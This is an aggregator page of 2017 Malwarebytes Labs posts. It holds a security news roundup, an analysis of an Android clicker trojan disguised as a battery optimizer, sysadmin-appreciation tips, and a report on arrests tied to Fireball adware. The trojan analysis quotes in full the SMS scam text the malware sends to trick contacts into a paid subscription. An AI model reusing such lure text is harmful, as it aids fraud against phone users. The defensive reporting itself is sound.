  • Hackers Are Targeting People Using Free Wi-Fi At Hotels Around The World. “Travellers are being warned about an evil new form of malware that is targeting people who use free Wi-Fi at hotels around the world. Notorious hackers the DarkHotel group, which have been targeting the IT systems of hotels for years are back with a new campaign which targets free Wi-Fi connections in hotels across the globe.” (Source: Thai Visa)
Latest updates for Businesses
  • As GDPR Approaches, Retail Data Breaches Remain Unacceptably High. “Two in five retailers across the globe have experienced a data breach in the past year, according to Thales and 451 Research. The report reveals that 43 percent of retailers had experienced a data breach in the last year, with a third claiming more than one. With 60% claiming that they had been breached in the past, it’s perhaps unsurprising to learn that 88% of retailers consider themselves to be ‘vulnerable’ to data threats, with 37% stating they are ‘very’ or ‘extremely’ vulnerable. As a result, three quarters of retailers expect their spending on IT security to increase.” (Source: Help Net Security)
  • Configuration Errors Blamed For Sensitive Data Exposed Via Google Groups. “Researchers at RedLock, working within the Cloud Security Intelligence team, say they’ve discovered hundreds of organizations exposing sensitive data via Google Groups, pinning the cause on basic configuration issues. ‘A customer-controlled configuration error in the Google Groups sharing settings has led to the exposure of sensitive data such as personally identifiable information (PII), including employee salary compensation details, sales pipeline data, customer passwords, names, email addresses and home addresses at hundreds of companies,’ an advisory shared with Salted Hash explains.” (Source: CSO)
  • Compliance And Employee Behavior Bother Data Security. “A survey of 304 IT professionals by HANDD found that 21% of respondents felt regulation, legislation and compliance will be one of the greatest business challenges to impact data security, while 21% believe that the behavior of employees and their reactions to social engineering attacks also pose a big challenge.” (Source: InfoSecurity Magazine)
  • Don’t Click On These New Fake Replies From ‘Customer Service Departments’. “Phishing is not a new crime, but the criminals who send phishing emails continue to refine their craft. One form of phishing email that seems to be gaining momentum is the ‘fake reply.’ According to a recent report by the Comodo Threat Intelligence Lab, Internet users now face ‘a new series of phishing emails that purport to be replies to previously asked requests for information from well-known brands and likely legitimate contacts.'” (Source: Inc)
  • Employees Working While On Holiday Open Orgs To Security Risks. “Many workers will feel the need to check-up on work emails while they are away from the office and enjoying a well-earned vacation. Unfortunately, by doing that, they can open organizations to many security risks. T-Systems, the corporate IT and cyber-security arm of Deutsche Telekom, has asked 2,050 full-time workers UK about their cyber security practices while on holiday…” (Source: Help Net Security)
  • Downtime from Ransomware More Lethal to Small Businesses Than the Ransom. “Of more than half of all small-to mid-sized businesses (SMBs) infected with ransomware in the past year, attackers demanded ransom of $1,000 or less – a drop in the bucket in comparison to the downtime these attacks cause, a new report shows.” (Source: Dark Reading)
  • The Right to Be Forgotten & the New Era of Personal Data Rights. “On May 25, 2018, the European Union’s General Data Protection Regulation (GDPR) will go into effect in Europe to help harmonize personal privacy rights across all 28 EU member states. Although individual countries can maintain their own privacy laws and impose additional penalties, GDPR establishes a common baseline of protections for citizens and residents of the EU and for collectors and processors of personal data — a set of common obligations and potential fines (up to 4% of global revenue per company per country).” (Source: Dark Reading)

Safe surfing, everyone!

The Malwarebytes Labs Team




The post A week in security (July 24 – July 30) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Malicious clicker with extra maliciousness included

Malwarebytes - Mon, 07/31/2017 - 14:00

A new malicious clicker has emerged onto third-party app stores. Chinese in origin, the malicious app uses heavy obfuscation and poses as a battery optimizer app. We classify is as Android/Trojan.Clicker.hyj.

Click to view slideshow. Hide what’s inside

To obfuscate its code, Clicker.hyj uses an APK inside another APK that hooks into the malicious code — allow me to explain. Let’s call the original APK that gets installed from a third-party app store onto the Android device the shell APK. After installation, the shell APK hooks into another APK, which is held in the shell APK’s data folder — let’s call this the executing APK. The executing APK holds all the malicious code while the shell APK contains simple code that runs some libraries which does the hooking of the executing APK. Looking at the shell APK code, there isn’t much to it. Because of its simplicity, it could easily be overlooked by malware researchers and/or scanners.

It’s important to note that the executing APK cannot be installed on an Android device alone — it must be run via the shell APK.

The meaty badness

The executing APK holds all the meaty badness. Within the executing APK’s assets folder are several JavaScript files. These JavaScript files have base64 encryption along with other encryption to further obfuscate. The JavaScript files are used to perform various actions when URLs are piped to them via code within the executing APK.

Although the code within the JavaScript files uses obfuscation, the file names are pretty telling of their actions:

  • findbutton20161226.js – Find button on webpage
  • getcaptcha4numberl.js -Get Captcha on webpage
  • processurl.js – Process URL
  • setcaptcha4numberl.js – Set Captcha on webpage
  • simulationClickYes.js – Click “Yes” on button in webpage

With each URL “clicked”, the malware authors are paid a small amount as a result. Therefore, running the actions from the JavaScript files over and over again on a small list of URLs can accumulate revenue quickly.

Shortcut to maliciousness

Another trait of Clicker.hyj is creating a shortcut that opens up the default Web browser to a URL that is no longer active — who knows what malicious content it once contained!

Even more money scams

To gain even more revenue, Clicker.hyj sends SMS messages to the affected device’s contact list. These SMS messages attempt to trick the user into subscribing to a pay-for-service via SMS:

This application has Asia's largest video library, is now to super preferential price of the massive broadcasting, constantly surprises. Just sms registration can receive various hot video. You want to hear our act in pettish, you want to take a look at the beauty of the hot body, Only INR30.00. immediately at the click of a button, fast join us! Wonderful content is absolutely not to be missed!

Subscribe to the “service” and as a result, an extra charge will appear on your phone bill each month.

All about the $$$

Crooks know there is real money in mobile malware — consequently, we will continue to see the rise of malware like Clicker.hyj.

In conclusion, be wary of installing third-party apps from untrusted app stores. It is also a good idea to always have a scanner installed on your phone like Malwarebytes anti-malware mobile — which, for the record, is FREE.

Stay safe out there!

Nathan Collier

The post Mobile Menace Monday: Malicious clicker with extra maliciousness included appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Today is System Administrator Appreciation Day

Malwarebytes - Fri, 07/28/2017 - 18:56

And we are enormously grateful. What started off as a tongue-and-cheek offshoot of Administrative Professionals Day has now become a special holiday that people around the world recognize and practice.

Dear reader, today is System Administrator Appreciation Day.

Let’s be honest, maintaining the security and integrity of a business network, ensuring that all computers connected to it are religiously patched, and that the printer is forever jam-free when you need it the most are no small feats. So, if you can, drop what you’re doing right now, head over to the IT wing, and treat your Sysadmins to coffee. Cake and ice cream aren’t bad either.

With the number of tasks Sysadmins usually have on their plate—all of them urgent more often than not—time is a precious commodity. So why not free them from sweating over the small stuff so they can have more time to relax and enjoy this day? Here are a number of ways you can do just that:

  • Schedule password changes. Yes, it may be high time to start reminding yourself (and not let your Sysadmin constantly do this for you) to change your password regularly after you’ve been using the same one for several months now. Circle a fixed date on your wall or table calendar, or set yourself a reminder to do this on your phone.There is a genuine need for password changes on a regular basis, and this is to keep both the enterprise and your personal accounts safe. Your Sysadmin will thank you for your diligence.
  • Use the ticketing system. We know the temptation to walk over to IT and ask for a solution is strong, but there’s a system in place for a reason. Ticketing systems are how IT and Sysadmins track how much work they are doing and how well they’re performing (and justify their staffing levels).Using them also guarantees your problems won’t slip through the cracks. Just remember to be as detailed as possible in describing your issues and be realistic on setting the urgency for them.
  • Eat and drink at your station at your own risk. Finishing a presentation for a meeting in half an hour with an empty stomach is an all-too familiar scenario most of us can relate to. This is also why, at times, we work and eat at our computers. It’s practical, after all.However, coffee and juice spill, and they almost always do over your (desktop or laptop) keyboard. Crumbs and other bits of food may find themselves wedged between keys and along the sides, too. Think about that today. Despite popular opinion, it’s not your Sysadmin’s job to clean your keyboard for you.
  • Start learning how to fix common technical issues by yourself. Does your computer seem slow? Maybe it’s not really your computer but your Internet connection. Say the program you’re using stopped responding and your screen appears frozen. Terminate the program via Task Manager or, if you like, do a hard reset. What if the printer won’t print? There are a number of ways you can address this, beginning with making sure your drivers are up-to-date and that the printer has paper and ink/toner.There will always be issues you wouldn’t be comfortable dealing with yourself. And once you reach that point, escalate to your Sysadmin accordingly.
  • When offered, attend and pay attention to security trainings. Nowadays, more companies are beginning to incorporate this into the work culture after realizing that basic security is becoming less of an option and more of a need. Don’t feel as though a sanctioned phishing training is meant to victimize you, the user. Sysadmins are trying to patch the end user and ingrain security reflexes to make everyone safer.Remember that falling for a sanctioned phishing email isn’t the end of the world. In fact, this a lot better than being phished for real! Having mandatory security awareness training isn’t that bad. Recognizing phishing attempts is hard, especially if they’re well crafted. Techniques change, and periodic training refreshes security awareness.

System Administrator Appreciation Day doesn’t have to start and end today. If we commit to doing at least one of the above from here on, every day would be Sysadmin Appreciation Day!


The post Today is System Administrator Appreciation Day appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fireball arrests made

Malwarebytes - Fri, 07/28/2017 - 15:30

Following some arrests in China, we may see a decrease in the amount of adware and adfraud hailing from the Rafotech labs.

According to some reports 250 million machines may have been infected with one variant or another of Rafotechs’ products. We have shared some information about the potential risks associated with their malware before. But according to this article in The Register the organization may have been beheaded by the eleven arrests the Chinese police made.

This graph shows how many detections Malwarebytes (versions 2 & 3) reported back for the month of July so far. The numbers of detections shown in the graph are only for Adware.Elex and associated detections.

click to enlarge

As you can see we have hit the 30,000 detections per day on occasion. Keep in mind, there are other families attributed to Fireball, but these have different vendor names. Anyway, we hope this curve will take a dive very soon.

On the surface Fireball infections may seem like just another browser hijacker, that simply changes your start-page, and the default search engine, but a closer look reveals capabilities of ad fraud, data gathering, and to download and install other malware. Also the methods in use by Elex covered almost the entire range of methods, including rootkits.

Reports about the arrests vary, but all sources agree that some of the most important managers of Rafotech were included. Rafotech is a digital marketing agency that earns money by combining the adware and browser hijackers in bundlers.

Remind me to have another look at the graph next month, so we can see if the arrests have had the effect we hoped for.

Pieter Arntz

The post Fireball arrests made appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds